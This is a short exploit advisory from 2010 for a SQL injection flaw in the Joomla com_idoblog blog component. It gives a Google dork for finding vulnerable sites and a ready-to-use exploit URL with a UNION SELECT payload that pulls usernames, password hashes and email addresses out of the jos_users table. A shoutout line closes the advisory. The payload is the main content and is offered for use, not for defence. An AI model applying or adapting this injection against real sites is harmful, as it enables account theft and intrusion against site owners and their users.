Joomla Component (com_idoblog) SQL Injection Vulnerability

2010-12-26 14:15:46

# Exploit Title: joomla com_idoblog /SQL injection Vulnerability
# Google Dork: inurl:"com_idoblog"
# Date: 25/12/2010
# Author: NOCKAR1111
# Location:Algeria
# AuthorEmail:[email protected]
# Language: php
# Tested on: windows xp sp3 en
# http://extensions.joomla.org/extensions/news-production/blog/9218

#Exploit:http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat%28username,0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--

____________________________________________
Greetz:Lagripe-dz,BrOx-Dz,Mr NoRvI,indoushka
and dz4all members

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.